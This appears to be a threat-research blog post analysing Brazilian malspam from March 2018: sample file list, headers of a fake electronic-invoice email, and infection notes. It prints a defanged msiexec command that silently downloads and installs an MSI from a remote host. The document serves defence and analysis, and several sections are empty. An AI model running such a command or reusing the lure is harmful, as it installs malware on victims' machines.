2018-03-20 - BRAZIL MALSPAM AND INFECTION TRAFFIC

ASSOCIATED FILES:

  • 2018-03-20-Brazil-malspam-1222-UTC.eml   (1,638 bytes)
  • 2018-03-20-Brazil-malspam-infection-traffic.pcap   (2,788,607 bytes)
  • 2018-03-20-downloaded-archive-Nota_Fiscal8987513469.pdf.zip   (731 bytes)
  • 2018-03-20-extracted-file-Nota_Fiscal8987513469.pdf.pdff-actually-a-zip-file.zip   (614 bytes)
  • 2018-03-20-second-extracted-file-Microsoft-shortcut-Nota_Fiscal8987513469.pdf.lnk.bin   (842 bytes)
  • 2018-03-20-scheduled-task-to-keep-infection-persistent.txt   (3,820 bytes)

 

WEB TRAFFIC BLOCK LIST

Indicators are not a block list.  If you feel the need to block web traffic, I suggest the following domains:

 

EMAIL:


Shown above:  Screenshot from the email.

 

EMAIL HEADERS:

Received: from X3530-WSERVER.bevicred.com.br ([187.73.214.27]) by [removed] for [removed];
     Tue, 20 Mar 2018 12:22:47 +0000 (UTC)
Received: from Recepcao (unknown [191.209.24.105])
     (Authenticated sender: formalizacao.ma1@bevicred.com.br)
     by X3530-WSERVER.bevicred.com.br (Postfix) with ESMTPA id 4A06B1435C73
     for [removed]; Tue, 20 Mar 2018 09:22:10 -0300 (-03)
Date: Tue, 20 Mar 2018 09:22:12 -0300
X-Priority: 3
Subject: Notificação 9985686405 de Emissão de Nota Fiscal Eletrônica.
X-Library: Indy 9.00.10
From: POLIPONTO COMERCIO E SERVICOS LTDA <formalizacao.ma1@bevicred.com.br>
Content-type: text/html
To: [removed]

 

LINK FROM THE EMAIL:

 

TRAFFIC


Shown above:  Traffic from an infection filtered in Wireshark.

 

NETWORK TRAFFIC FROM AN INFECTED LAB HOST:

 

FILE HASHES

MALWARE RETRIEVED FROM AN INFECTED WINDOWS HOST:

  • C:\Windows\system32\msiexec.exe /i hxxp://486lrlk94.mike-ehrmantraut.wikaba.com:25047/01/dimfrags.msi?ddOYIFJbm /q

 

IMAGES


Shown above:  From downloaded zip archive to the Windows shortcut.

 


Shown above:  Scheduled task to keep the infection persistent.

 

FINAL NOTES

Once again, here are the associated files:

Zip archives are password-protected with the standard password.  If you don't know it, look at the "about" page of this website.

 

Click here to return to the main page.